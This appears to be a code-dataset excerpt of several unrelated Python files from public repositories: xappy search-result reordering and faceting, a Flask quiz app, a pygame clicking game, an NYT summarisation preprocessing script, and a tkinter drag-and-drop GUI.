try:\n if slotnum is not None:\n decider = None\n clusterer.cluster(xapclusters, docsim, source, slotnum, num_clusters)\n else:\n decider = self._make_expand_decider(fields)\n clusterer.cluster(xapclusters, docsim, source, decider, num_clusters)\n except TypeError:\n # backwards compatibility; used to have to supply the index as\n # first param, and didn't have the slotnum option.\n if decider is None:\n decider = self._make_expand_decider(fields)\n clusterer.cluster(self._conn._index,\n xapclusters, docsim, source, decider, num_clusters)\n\n newid = 0\n idmap = {}\n clusters = {}\n for item in self.mset:\n docid = item.docid\n clusterid = xapclusters.cluster(docid)\n if clusterid not in idmap:\n idmap[clusterid] = newid\n newid += 1\n clusterid = idmap[clusterid]\n if clusterid not in clusters:\n clusters[clusterid] = []\n clusters[clusterid].append(item.rank)\n return clusters\n\n def _reorder_by_collapse(self, highest_possible_percentage):\n \"\"\"Reorder the result by the values in the slot used to collapse on.\n\n `highest_possible_percentage` is a tuning variable - we need to get an\n estimate of the probability that a particular hit satisfies the query.\n We use the relevance score for this estimate, but this requires us to\n pick a value for the top hit. This variable specifies that percentage.\n\n \"\"\"\n\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by collapse\")\n if not hasattr(self, \"collapse_max\"):\n raise errors.SearchError(\"A collapse must have been performed on the search in order to use _reorder_by_collapse\")\n\n if self.collapse_max == 1:\n # No reordering to do - we're already fully diverse according to\n # the values in the slot.\n return\n\n if self.mset.get_firstitem() + len(self.mset) <= 1:\n # No reordering to do - 0 or 1 items.\n return\n\n topweight = self.mset.get_hit(0).weight\n toppct = self.mset.get_hit(0).percent\n if topweight == 0 or toppct == 0:\n # No weights, so no reordering to do.\n # FIXME - perhaps we should pick items from each bin in turn until\n # the bins run out? Not sure this is useful in any real situation,\n # though.\n return\n\n maxweight = topweight * 100.0 * 100.0 / highest_possible_percentage / float(toppct)\n\n # utility of each category; initially, this is the probability that the\n # category is relevant.\n utilities = {}\n pqc_sum = 0.0\n\n # key is the collapse key, value is a list of (rank, weight) tuples,\n # in that collapse bin.\n collapse_bins = {}\n\n # Fill collapse_bins.\n for i in xrange(self.mset.get_firstitem() + len(self.mset)):\n hit = self.mset.get_hit(i)\n category = hit.collapse_key\n try:\n l = collapse_bins[category]\n except KeyError:\n l = []\n collapse_bins[category] = l\n if i < 100:\n utilities[category] = hit.weight\n pqc_sum += hit.weight\n l.append((i, hit.weight / maxweight))\n\n pqc_sum /= 0.99 # Leave 1% probability for other categories\n\n # Nomalise the probabilities for each query category, so they add up to\n # 1.\n utilities = dict((k, v / pqc_sum)\n for (k, v)\n in utilities.iteritems())\n\n # Calculate scores for the potential next hits. 
These are the top\n # weighted hits in each category.\n potentials = {}\n for category, l in collapse_bins.iteritems():\n wt = l[0][1] # weight of the top item\n score = wt * utilities.get(category, 0.01) # current utility of the category\n potentials[category] = (l[0][0], score, wt)\n\n new_order = []\n while len(collapse_bins) != 0:\n # The potential next hits are the ones at the top of each\n # collapse_bin.\n\n # Pick the next category to use, by finding the maximum score\n # (breaking ties by choosing the highest ranked one in the original\n # order).\n next_cat, (next_i, next_score, next_wt) = max(potentials.iteritems(), key=lambda x: (x[1][1], -x[1][0]))\n\n # Update the utility of the chosen category\n utilities[next_cat] = (1.0 - next_wt) * utilities.get(next_cat, 0.01)\n \n # Move the newly picked item from collapse_bins to new_order\n new_order.append(next_i)\n l = collapse_bins[next_cat]\n if len(l) <= 1:\n del collapse_bins[next_cat]\n del potentials[next_cat]\n else:\n collapse_bins[next_cat] = l[1:]\n wt = l[1][1] # weight of the top item\n potentials[next_cat] = (l[1][0],\n wt * utilities.get(next_cat, 0.01), wt)\n\n return ReorderedMSetResultOrdering(self.mset, new_order, self.context)\n\n def _reorder_by_clusters(self, clusters):\n \"\"\"Reorder the mset based on some clusters.\n\n \"\"\"\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by clusters\")\n tophits = []\n nottophits = []\n\n clusterstarts = dict(((c[0], None) for c in clusters.itervalues()))\n for i in xrange(self.mset.get_firstitem() + len(self.mset)):\n if i in clusterstarts:\n tophits.append(i)\n else:\n nottophits.append(i)\n new_order = tophits\n new_order.extend(nottophits)\n return ReorderedMSetResultOrdering(self.mset, new_order, self.context)\n\n def _get_singlefield_slot(self, fields, assume_single_value):\n \"\"\"Return the slot number if the specified list of fields contains only\n one entry, and that entry is single-valued for each document, and\n stored in a value slot.\n\n Return None otherwise.\n\n \"\"\"\n prefixes = {}\n if isinstance(fields, basestring):\n fields = [fields]\n if len(fields) != 1:\n return None\n\n field = fields[0]\n try:\n actions = self._conn._field_actions[field]._actions\n except KeyError:\n return None\n\n for action, kwargslist in actions.iteritems():\n if action == FieldActions.SORTABLE:\n return self._conn._field_mappings.get_slot(field, 'collsort')\n if action == FieldActions.WEIGHT:\n return self._conn._field_mappings.get_slot(field, 'weight')\n if assume_single_value:\n if action == FieldActions.FACET:\n return self._conn._field_mappings.get_slot(field, 'facet')\n\n def _make_expand_decider(self, fields):\n \"\"\"Make an expand decider which accepts only terms in the specified\n field.\n\n \"\"\"\n prefixes = {}\n if isinstance(fields, basestring):\n fields = [fields]\n for field in fields:\n try:\n actions = self._conn._field_actions[field]._actions\n except KeyError:\n continue\n for action, kwargslist in actions.iteritems():\n if action == FieldActions.INDEX_FREETEXT:\n prefix = self._conn._field_mappings.get_prefix(field)\n prefixes[prefix] = None\n prefixes['Z' + prefix] = None\n if action in (FieldActions.INDEX_EXACT,\n FieldActions.FACET,):\n prefix = self._conn._field_mappings.get_prefix(field)\n prefixes[prefix] = None\n prefix_re = re.compile('|'.join([re.escape(x) + '[^A-Z]' for x in prefixes.keys()]))\n class decider(xapian.ExpandDecider):\n def __call__(self, term):\n return prefix_re.match(term) is 
not None\n return decider()\n\n def _reorder_by_similarity(self, count, maxcount, max_similarity,\n fields):\n \"\"\"Reorder results based on similarity.\n\n The top `count` documents will be chosen such that they are relatively\n dissimilar. `maxcount` documents will be considered for moving around,\n and `max_similarity` is a value between 0 and 1 indicating the maximum\n similarity to the previous document before a document is moved down the\n result set.\n\n Note: this method is experimental, and will probably disappear or\n change in the future.\n\n \"\"\"\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by similiarity\")\n ds = xapian.DocSimCosine()\n ds.set_termfreqsource(xapian.DatabaseTermFreqSource(self._conn._index))\n\n if fields is not None:\n ds.set_expand_decider(self._make_expand_decider(fields))\n\n tophits = []\n nottophits = []\n full = False\n reordered = False\n\n sim_count = 0\n new_order = []\n end = min(self.mset.get_firstitem() + len(self.mset), maxcount)\n for i in xrange(end):\n if full:\n new_order.append(i)\n continue\n hit = self.mset.get_hit(i)\n if len(tophits) == 0:\n tophits.append(hit)\n continue\n\n # Compare each incoming hit to tophits\n maxsim = 0.0\n for tophit in tophits[-1:]:\n sim_count += 1\n sim = ds.similarity(hit.document, tophit.document)\n if sim > maxsim:\n maxsim = sim\n\n # If it's not similar to an existing hit, add to tophits.\n if maxsim < max_similarity:\n tophits.append(hit)\n else:\n nottophits.append(hit)\n reordered = True\n\n # If we're full of hits, append to the end.\n if len(tophits) >= count:\n for hit in tophits:\n new_order.append(hit.rank)\n for hit in nottophits:\n new_order.append(hit.rank)\n full = True\n if not full:\n for hit in tophits:\n new_order.append(hit.rank)\n for hit in nottophits:\n new_order.append(hit.rank)\n if end != self.mset.get_firstitem() + len(self.mset):\n new_order.extend(range(end,\n self.mset.get_firstitem() + len(self.mset)))\n assert len(new_order) == self.mset.get_firstitem() + len(self.mset)\n if reordered:\n return ReorderedMSetResultOrdering(self.mset, new_order,\n self.context)\n else:\n assert new_order == range(self.mset.get_firstitem() +\n len(self.mset))\n return self\n\n\nclass ResultStats(object):\n def __init__(self, mset, cache_stats):\n self.mset = mset\n self.cache_stats = list(cache_stats)\n\n def get_lower_bound(self):\n if self.cache_stats[0] is None:\n self.cache_stats[0] = self.mset.get_matches_lower_bound()\n return self.cache_stats[0]\n\n def get_upper_bound(self):\n if self.cache_stats[1] is None:\n self.cache_stats[1] = self.mset.get_matches_upper_bound()\n return self.cache_stats[1]\n\n def get_estimated(self):\n if self.cache_stats[2] is None:\n self.cache_stats[2] = self.mset.get_matches_estimated()\n return self.cache_stats[2]\n\n\nclass ReorderedMSetSearchResultIter(object):\n \"\"\"An iterator over a set of results from a search which have been\n reordered.\n\n \"\"\"\n def __init__(self, mset, order, context):\n self.mset = mset\n self.order = order\n self.context = context\n self.it = iter(self.order)\n\n def next(self):\n index = self.it.next()\n msetitem = self.mset.get_hit(index)\n return SearchResult(msetitem, self.context)\n\n\nclass ReorderedMSetResultOrdering(object):\n def __init__(self, mset, mset_order, context):\n self.mset = mset\n self.mset_order = mset_order\n self.context = context\n\n def get_iter(self):\n \"\"\"Get an iterator over the search results.\n\n \"\"\"\n return 
ReorderedMSetSearchResultIter(self.mset, self.mset_order,\n self.context)\n\n def get_hit(self, index):\n \"\"\"Get the hit with a given index.\n\n \"\"\"\n msetitem = self.mset.get_hit(self.mset_order[index])\n return SearchResult(msetitem, self.context)\n\n def get_startrank(self):\n return self.mset.get_firstitem()\n\n def get_endrank(self):\n return self.mset.get_firstitem() + len(self.mset)\n\n def __len__(self):\n \"\"\"Get the number of items in this ordering.\n\n \"\"\"\n return len(self.mset_order)\n\n\nclass NoFacetResults(object):\n \"\"\"Stub used when no facet results asked for.\n\n \"\"\"\n def __init__(self, *args, **kwargs):\n pass\n\n def get_facets(self):\n raise errors.SearchError(\"Facet selection wasn't enabled when the search was run\")\n\n def get_suggested_facets(self, maxfacets, required_facets):\n raise errors.SearchError(\"Facet selection wasn't enabled when the search was run\")\n\n\nclass FacetResults(object):\n \"\"\"The result of counting facets.\n\n \"\"\"\n def __init__(self, facetspies, facetfields, facethierarchy, facetassocs,\n desired_num_of_categories, cache_facets):\n self.facetspies = facetspies\n self.facetfields = facetfields\n self.facethierarchy = facethierarchy\n self.facetassocs = facetassocs\n\n self.facetvalues = {}\n self.facetscore = {}\n for field, slot, facettype in facetfields:\n values, score = self._calc_facet_value(slot, facettype,\n desired_num_of_categories)\n self.facetvalues[field] = values\n self.facetscore[field] = score\n\n if cache_facets is not None:\n self.facetvalues.update(cache_facets)\n self.facetscore.update((fieldname, 0)\n for fieldname, _ in cache_facets)\n\n def _calc_facet_value(self, slot, facettype, desired_num_of_categories):\n \"\"\"Calculate the facet value for a given slot, and return it.\n\n \"\"\"\n facetspy = self.facetspies.get(slot, None)\n if facetspy is None:\n return (), 0\n else:\n if facettype == 'float':\n if hasattr(xapian, 'UnbiasedNumericRanges'):\n try:\n # backwards compatibility\n ranges = xapian.UnbiasedNumericRanges(\n facetspy.get_values(), desired_num_of_categories)\n except AttributeError:\n ranges = xapian.UnbiasedNumericRanges(\n facetspy, desired_num_of_categories)\n else:\n ranges = xapian.NumericRanges(facetspy.get_values(),\n desired_num_of_categories)\n values = tuple(sorted(ranges.get_ranges_as_dict().iteritems()))\n else:\n try:\n values = tuple((item.term, item.termfreq)\n for item in facetspy.values())\n except AttributeError:\n # backwards compatibility\n values = facetspy.get_values_as_dict()\n values = tuple(sorted(values.iteritems()))\n score = math.fabs(len(values) - desired_num_of_categories)\n if len(values) <= 1:\n score = 1000\n return values, score\n\n def get_facets(self):\n \"\"\"Get all the calculated facets.\n\n Returns a dictionary, mapping from field name to the values for that\n field.\n\n \"\"\"\n return self.facetvalues\n\n def get_suggested_facets(self, maxfacets, required_facets):\n \"\"\"Get the suggested facets. 
Parameters and return value are as for\n `SearchResults.get_suggested_facets()`.\n\n \"\"\"\n if isinstance(required_facets, basestring):\n required_facets = [required_facets]\n scores = []\n\n for field in self.facetvalues.iterkeys():\n score = self.facetscore[field] \n scores.append((score, field))\n\n # Sort on whether facet is top-level ahead of score (use subfacets first),\n # and on whether facet is preferred for the query type ahead of anything else\n if self.facethierarchy:\n # Note, tuple[-1] is the value of 'field' in a scores tuple\n scores = [(tuple[-1] not in self.facethierarchy,) + tuple for tuple in scores]\n if self.facetassocs:\n preferred = IndexerConnection.FacetQueryType_Preferred\n scores = [(self.facetassocs.get(tuple[-1]) != preferred,) + tuple for tuple in scores]\n scores.sort()\n if self.facethierarchy:\n index = 1\n else:\n index = 0\n if self.facetassocs:\n index += 1\n if index > 0:\n scores = [tuple[index:] for tuple in scores]\n\n results = []\n required_results = []\n for score, field in scores:\n # Check if the facet is required\n required = False\n if required_facets is not None:\n required = field in required_facets\n\n # If we've got enough facets, and the field isn't required, skip it\n if not required and len(results) + len(required_results) >= maxfacets:\n continue\n\n values = self.facetvalues[field] \n\n # Required facets must occur at least once, other facets must occur\n # at least twice.\n if required:\n if len(values) < 1:\n continue\n else:\n if len(values) <= 1:\n continue\n\n score = self.facetscore[field] \n if required:\n required_results.append((score, field, values))\n else:\n results.append((score, field, values))\n\n # Throw away any excess results if we have more required_results to\n # insert.\n maxfacets = maxfacets - len(required_results)\n if maxfacets <= 0:\n results = required_results\n else:\n results = results[:maxfacets]\n results.extend(required_results)\n results.sort()\n\n # Throw away the scores because they're not meaningful outside this\n # algorithm.\n results = [(field, newvalues) for (score, field, newvalues) in results]\n return results\n","repo_name":"miracle2k/xappy","sub_path":"xappy/mset_search_results.py","file_name":"mset_search_results.py","file_ext":"py","file_size_in_byte":22191,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"37056292160","text":"import os\r\n\r\nfrom flask import Flask, session, request, redirect, render_template, url_for, Response\r\nfrom http import HTTPStatus\r\nfrom db_crud import get_question_after\r\nfrom dotenv import load_dotenv\r\n\r\nimport utility_functions\r\nfrom object_types import template\r\n\r\nload_dotenv()\r\nfolder = os.getcwd() # запомнили текущую рабочую папку и создаем объект app\r\napp = Flask(__name__, template_folder=folder+\"/template\", static_folder=folder+\"/static\")\r\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY') # Получаем ключ шифрованмя из переменной среды\r\n\r\n\r\n@app.route('/', methods=[\"GET\", \"POST\"])\r\ndef index() -> template | Response | HTTPStatus:\r\n \"\"\" Корневая страница:\r\n - если пришли с запросом GET, то предаставляем список викторин;\r\n - если POST - то фиксируем id викторины и перенаправляем на вопросы \"\"\"\r\n if request.method == 'GET':\r\n utility_functions.start_quiz(-1) # сбрасываем id викторины и показываем форму выбора\r\n return utility_functions.quiz_form()\r\n elif request.method == 'POST':\r\n quest_id = request.form.get('quiz') # фиксируем 
the quiz number selected in the submitted data\r\n utility_functions.start_quiz(int(quest_id))\r\n return redirect(url_for('test'))\r\n else:\r\n return HTTPStatus.BAD_REQUEST\r\n\r\n\r\n@app.route('/test', methods=[\"GET\", \"POST\"])\r\ndef test() -> template | Response:\r\n \"\"\" Returns the question page template, assembled according to the selected quiz \"\"\"\r\n if not ('quiz' in session) or int(session['quiz']) < 0:\r\n return redirect(url_for('index'))\r\n else:\r\n if request.method == 'POST': # update the current state when data is received\r\n utility_functions.save_answers()\r\n next_question = get_question_after(session['last_question'], session['quiz'])\r\n if next_question is None or len(next_question) == 0: # check whether any questions remain\r\n return redirect(url_for('result'))\r\n else:\r\n return utility_functions.question_form(next_question)\r\n\r\n\r\n@app.route('/result', methods=[\"GET\"])\r\ndef result() -> template | Response:\r\n \"\"\" Returns the quiz result based on the answers saved in the session \"\"\"\r\n if 'answers' in session:\r\n html = render_template('result.html', right=session['answers'], total=session['total'])\r\n utility_functions.end_quiz() # build the result page first, then finish the quiz\r\n return html\r\n else:\r\n return redirect(url_for('index'))\r\n\r\n\r\n# Entry point\r\nif __name__ == \"__main__\":\r\n app.run(\r\n host='0.0.0.0',\r\n port=8080)\r\n","repo_name":"mementomorri/quiz_constructor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33770481330","text":"import pygame\nfrom pygame.draw import *\nfrom random import randint\nimport time\npygame.init()\n\n# a, b, FPS - screen width and height in pixels, plus the frame rate\nFPS = 30\na = 1000\nb = 700\nscreen = pygame.display.set_mode((a,b))\n\n# Create the variables and arrays needed later on\nX = []\nV_X = []\nY = []\nV_Y = []\nR = []\nCOLOR = []\nt = 1\nscore = 0\nu=0\n\n# Colors for the game\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\n\n\n\n\ndef new_ball():\n '''Creates a new ball and stores its attributes in the corresponding arrays'''\n global x, y, r, v_x, v_y, color, i\n x = randint(100, 900)\n v_x = randint(-7, 7)\n v_y = randint(-7, 7)\n y = randint(100, 600)\n r = randint(10, 100)\n color = COLORS[randint(0, 5)]\n circle(screen, color, (x, y), r)\n pygame.display.update()\n X.append(x)\n V_X.append(v_x)\n Y.append(y)\n V_Y.append(v_y)\n R.append(r)\n COLOR.append(color)\n\n \n \ndef move_items():\n '''Moves every created object. 
When needed, performs a random bounce off the\n walls. This function uses t, which scales the displacement between frames;\n a, b are the width and height of the application's working area.'''\n for j in range (k):\n circle(screen, BLACK, (X[j], Y[j]), R[j])\n if X[j]-R[j] <= 0:\n V_X[j] = randint(1, 7)\n V_Y[j] = randint(-7, 7)\n X[j] = 0 + R[j]\n elif X[j] + R[j] >= a:\n V_X[j] = randint(-7, -1)\n V_Y[j] = randint(-7, 7)\n X[j] = a - R[j]\n elif Y[j]- R[j] <= 0:\n V_Y[j] = randint(1, 7)\n V_X[j] = randint(-7, 7)\n Y[j] = 0 + R[j]\n elif Y[j]+R[j] >= b:\n V_Y[j] = randint(-7, -1)\n V_X[j] = randint(-7, 7)\n Y[j] = b - R[j]\n X[j] = X[j] + V_X[j]*t\n Y[j] = Y[j] + V_Y[j]*t\n circle(screen, COLOR[j], (X[j], Y[j]), R[j])\n pygame.display.update()\n \n\ndef check_click():\n '''Checks whether the player hit a target; on a hit, creates a new target'''\n global score\n for j in range (k):\n if R[j] - ((event.pos[0]-X[j])**2+(event.pos[1]-Y[j])**2)**0.5 > 0:\n score += 1\n print(\"You hit it!!! Your score is now: \", score)\n circle(screen, BLACK, (X[j], Y[j]), R[j])\n X.pop(j)\n Y.pop(j)\n R.pop(j)\n V_Y.pop(j)\n V_X.pop(j)\n COLOR.pop(j)\n new_ball()\n \n \ndef create_k_balls():\n '''creates k balls'''\n global u\n while u 0:\n return None\n\n article_xml = soup.find(\"block\", {\"class\": \"full_text\"})\n if article_xml is None:\n return None\n\n article_text = get_article_text(article_xml)\n if len(article_text.split()) < 200:\n return None\n \n abstract_xml = soup.find(\"abstract\")\n if abstract_xml is not None:\n abs_txt = abstract_xml.get_text()\n else:\n abs_txt = \"\"\n\n online_lead_xml = soup.find(\n \"block\", {\"class\": \"online_lead_paragraph\"})\n if online_lead_xml is not None:\n online_lead_txt = online_lead_xml.get_text()\n else: \n online_lead_txt = \"\"\n if len(abs_txt.split()) + len(online_lead_txt.split()) < 100:\n return None\n doc_id = soup.find(\"doc-id\")[\"id-string\"]\n \n for ww in nyt_remove_words:\n abs_txt = abs_txt.replace(ww, '')\n\n return article_text, abs_txt, online_lead_txt, doc_id, sections\n\ndef prepare_example(article_text, abstract_text, ol_text, doc_id, sections):\n global nlp\n inputs = []\n article_text = article_text.replace(\"\\n\", \" \")\n doc = nlp(article_text)\n for sent in doc.sentences:\n tokens_all = [w for w in sent.words\n if w.text.strip() != '']\n if len(tokens_all) == 0:\n continue\n tokens = [w.text.strip() for w in tokens_all]\n pretty_text = sent.text.strip()\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n inputs.append({\"tokens\": tokens, \"text\": pretty_text, \"word_count\": len(pretty_text.split())})\n for i, inp in enumerate(inputs, 1):\n inp[\"sentence_id\"] = i\n\n summary_texts = []\n if len(abstract_text) > 0:\n summary_texts.append(abstract_text)\n input_texts = [inp[\"text\"] if inp[\"word_count\"] > 2 else \"@@@@@\"\n for inp in inputs[:50]]\n\n # ROUGE 1 score.\n ranks, pairwise_ranks = rouge_papier.compute_extract(\n input_texts, summary_texts, mode=\"sequential\", ngram=1,\n remove_stopwords=True, length=100)\n\n labels = [1 if r > 0 else 0 for r in ranks]\n if len(labels) < len(inputs):\n labels.extend([0] * (len(inputs) - len(labels)))\n example = {\"id\": doc_id, \"inputs\": inputs, \"sections\": sections}\n return example, labels, abstract_text, ol_text\n\ndef init_worker():\n global nlp\n nlp = stanza.Pipeline('en', processors='tokenize')\n\ndef worker(args):\n content, outputs_dir, model = args\n\n # Process xml to get document 
and summary text. \n doc_data = extract_doc(content)\n if doc_data is None:\n return False\n article_text, abs_txt, online_lead_txt, doc_id, sections = doc_data\n if len(abs_txt) < 50:\n return False\n example, labels, abstract_text, ol_text = prepare_example(\n article_text, abs_txt, online_lead_txt, doc_id, sections)\n\n assert abstract_text == abs_txt\n assert online_lead_txt == ol_text\n\n assert len(labels) == len(example[\"inputs\"])\n\n \n # if the number of tokens up to the third labelled sentence is greater than 512, return false.\n label_locs = [i for i, value in enumerate(labels) if value == 1]\n if len(label_locs) < 3:\n # fewer than three extractive labels: label_locs[2] below would raise an IndexError\n return False\n token_count = 0\n for x in range(label_locs[2]+1):\n token_count += len(example[\"inputs\"][x][\"tokens\"])\n token_count += (label_locs[2]+1)*2\n\n # print(label_locs)\n # print(example['id'], token_count)\n\n if token_count > 512:\n return False\n\n if model == \"barthes\":\n outputs_path = outputs_dir / \"{}.tsv\".format(example[\"id\"])\n with open(outputs_path, \"w\", encoding='utf-8') as outfile:\n for i, sent in enumerate(example[\"inputs\"][::]):\n text = sent[\"tokens\"]\n pretty_text = \" \".join(text)\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n if labels[i] == 1:\n print(\"1\\t\", end=\"\", file=outfile)\n print(pretty_text, file=outfile)\n else:\n print(\"0\\t\", end=\"\", file=outfile)\n print(pretty_text, file=outfile)\n print(\"0\\t\", end=\"\", file=outfile)\n print(\"<|endoftext|>\", end=\"\", file=outfile)\n return True\n \n elif model == \"presumm\":\n outputs_path = outputs_dir / \"nyt.{}.test.json\".format(example[\"id\"])\n with open(outputs_path, \"w\", encoding='utf-8') as outfile:\n doc = {\n \"src\": [],\n \"tgt\": labels\n }\n for i, sent in enumerate(example[\"inputs\"][::]):\n # save each sentence as a list.\n text = sent[\"tokens\"]\n pretty_text = \" \".join(text)\n pretty_text = re.sub(r\"\\r|\\n|\\t\", r\" \", pretty_text)\n pretty_text = re.sub(r\"\\s+\", r\" \", pretty_text)\n words = pretty_text.split()\n doc[\"src\"].append(words)\n json.dump(doc, outfile)\n\n return True\n\ndef preprocess_part(tar_paths, outputs_dir, model, procs=16):\n\n outputs_dir.mkdir(exist_ok=True, parents=True)\n\n def data_iter():\n for tar_path in tar_paths:\n for content in doc_iter(tar_path):\n yield content, outputs_dir, model\n \n pool = multiprocessing.Pool(procs, initializer=init_worker)\n count = 0\n for i, is_good in enumerate(pool.imap(worker, data_iter()), 1):\n if is_good:\n count += 1\n print(\"{}\".format(count), end=\"\\r\", flush=True)\n print()\n\ndef main(args):\n\n procs = min(multiprocessing.cpu_count(), 16)\n\n paths = get_paths(args.nyt)\n\n train_paths = paths[:-30]\n valid_paths = paths[-30:-18]\n test_paths = paths[-18:]\n print(train_paths[0], train_paths[-1])\n print(valid_paths[0], valid_paths[-1])\n print(test_paths[0], test_paths[-1])\n\n # Preprocess the validation data. 
5000\n # preprocess_part(\n # valid_paths, \n # args.data_dir / args.model / \"nyt\" / \"valid\",\n # procs=procs)\n\n preprocess_part(\n test_paths, \n args.data_dir / args.model / \"nyt\" / \"test\",\n args.model,\n procs=procs)\n\n # preprocess_part(\n # train_paths, \n # args.data_dir / args.model / \"nyt\" / \"train\",\n # procs=procs)\n\nif __name__ == \"__main__\":\n stanza.download('en')\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nyt\", type=pathlib.Path, required=True)\n parser.add_argument(\"--model\", type=str, required=True)\n parser.add_argument(\"--data-dir\", type=pathlib.Path, required=True)\n args = parser.parse_args()\n main(args)","repo_name":"jordankettles/long_narratives","sub_path":"preprocessing/preprocess_nyt.py","file_name":"preprocess_nyt.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3311901891","text":"import tkinter\r\nimport PIL.Image, PIL.ImageTk\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nimport numpy as np\r\nimport os\r\nfrom B_box import my_Buttonbox\r\n\r\ndef compute_resize_factor(h,w,win_h,win_w):\r\n print(h)\r\n print(win_h)\r\n rf=(0.85*win_h)/h\r\n while True:\r\n rf -= 0.01\r\n if rf*w<(0.95*win_w):\r\n print(rf)\r\n return rf\r\n rf-=0.01\r\n\r\n\r\n# The factory function\r\ndef dnd_start(source, event):\r\n h = DndHandler(source, event)\r\n if h.root:\r\n return h\r\n else:\r\n return None\r\n\r\n\r\n# The class that does the work\r\n\r\nclass DndHandler:\r\n\r\n root = None\r\n\r\n def __init__(self, source, event):\r\n if event.num > 5:\r\n return\r\n root = event.widget._root()\r\n try:\r\n root.__dnd\r\n return # Don't start recursive dnd\r\n except AttributeError:\r\n root.__dnd = self\r\n self.root = root\r\n self.source = source\r\n self.target = None\r\n self.initial_button = button = event.num\r\n self.initial_widget = widget = event.widget\r\n self.release_pattern = \"<B%d-ButtonRelease-%d>\" % (button, button)\r\n self.save_cursor = widget['cursor'] or \"\"\r\n widget.bind(self.release_pattern, self.on_release)\r\n widget.bind(\"<Motion>\", self.on_motion)\r\n widget['cursor'] = \"hand2\"\r\n\r\n def __del__(self):\r\n root = self.root\r\n self.root = None\r\n if root:\r\n try:\r\n del root.__dnd\r\n\r\n except AttributeError:\r\n pass\r\n\r\n def on_motion(self, event):\r\n x, y = event.x_root, event.y_root\r\n target_widget = self.initial_widget.winfo_containing(x, y)\r\n source = self.source\r\n new_target = None\r\n while target_widget:\r\n try:\r\n attr = target_widget.dnd_accept\r\n except AttributeError:\r\n pass\r\n else:\r\n new_target = attr(source, event)\r\n if new_target:\r\n break\r\n target_widget = target_widget.master\r\n old_target = self.target\r\n if old_target is new_target:\r\n if old_target:\r\n old_target.dnd_motion(source, event)\r\n else:\r\n if old_target:\r\n self.target = None\r\n old_target.dnd_leave(source, event)\r\n if new_target:\r\n new_target.dnd_enter(source, event)\r\n self.target = new_target\r\n\r\n def on_release(self, event):\r\n self.finish(event, 1)\r\n\r\n def cancel(self, event=None):\r\n self.finish(event, 0)\r\n\r\n def finish(self, event, commit=0):\r\n target = self.target\r\n source = self.source\r\n widget = self.initial_widget\r\n root = self.root\r\n try:\r\n del root.__dnd\r\n self.initial_widget.unbind(self.release_pattern)\r\n self.initial_widget.unbind(\"<Motion>\")\r\n widget['cursor'] = self.save_cursor\r\n self.target = self.source = 
self.initial_widget = self.root = None\r\n if target:\r\n if commit:\r\n target.dnd_commit(source, event)\r\n else:\r\n target.dnd_leave(source, event)\r\n finally:\r\n source.dnd_end(target, event)\r\n\r\n\r\n\r\n# ----------------------------------------------------------------------\r\n# The rest is here for testing and demonstration purposes only!\r\n\r\nclass Icon:\r\n\r\n def __init__(self, name,type=-1,prev=False):\r\n self.name = name\r\n self.canvas = self.label = self.id = None\r\n self.prev=prev\r\n self.type=type\r\n\r\n def attach(self, canvas, x=100, y=100,w_s=100):\r\n\r\n if canvas is self.canvas:\r\n self.canvas.coords(self.id, x, y)\r\n return\r\n if self.canvas:\r\n self.detach()\r\n if not canvas:\r\n return\r\n txt=self.name\r\n ww=5\r\n hh=1\r\n ccolor='red'\r\n if self.prev:\r\n txt='type '+self.type\r\n ww=5\r\n hh=2\r\n ccolor='blue'\r\n label = tkinter.Label(canvas, text=txt,\r\n borderwidth=0,bg=ccolor,cursor=\"hand1\",height=hh, width=ww)\r\n\r\n id = canvas.create_window(x, y-w_s, window=label, anchor=\"nw\")\r\n self.canvas = canvas\r\n self.label = label\r\n self.id = id\r\n label.bind(\"\", self.press)\r\n\r\n\r\n def detach(self):\r\n canvas = self.canvas\r\n if not canvas:\r\n return\r\n id = self.id\r\n label = self.label\r\n self.canvas = self.label = self.id = None\r\n canvas.delete(id)\r\n label.destroy()\r\n\r\n def press(self, event):\r\n if dnd_start(self, event):\r\n # where the pointer is relative to the label widget:\r\n self.x_off = event.x\r\n self.y_off = event.y\r\n # where the widget is relative to the canvas:\r\n self.x_orig, self.y_orig = self.canvas.coords(self.id)\r\n\r\n def putback(self):\r\n self.canvas.coords(self.id, self.x_orig, self.y_orig)\r\n\r\n def where(self, canvas, event,w_s=100):\r\n # where the corner of the canvas is relative to the screen:\r\n x_org = canvas.winfo_rootx()\r\n y_org = canvas.winfo_rooty()\r\n # where the pointer is relative to the canvas widget:\r\n x = event.x_root - x_org\r\n y = event.y_root - y_org\r\n cell_x=x\r\n cell_y=y+w_s\r\n # compensate for initial pointer offset\r\n return x - self.x_off, y - self.y_off,cell_x,cell_y\r\n\r\n def dnd_end(self, target, event):\r\n pass\r\nclass App1:\r\n def __init__(self, window, window_title):\r\n self.window = window\r\n self.window.title(window_title)\r\n self.widthpixels = self.window.winfo_screenwidth()\r\n self.heightpixels = self.window.winfo_screenheight()\r\n print(self.heightpixels, self.widthpixels)\r\n self.resize_factor = None\r\n self.window.geometry('{}x{}'.format(self.widthpixels, self.heightpixels))\r\n self.button_frame = Frame(self.window)\r\n self.button_frame.pack(side=BOTTOM, fill=Y)\r\n 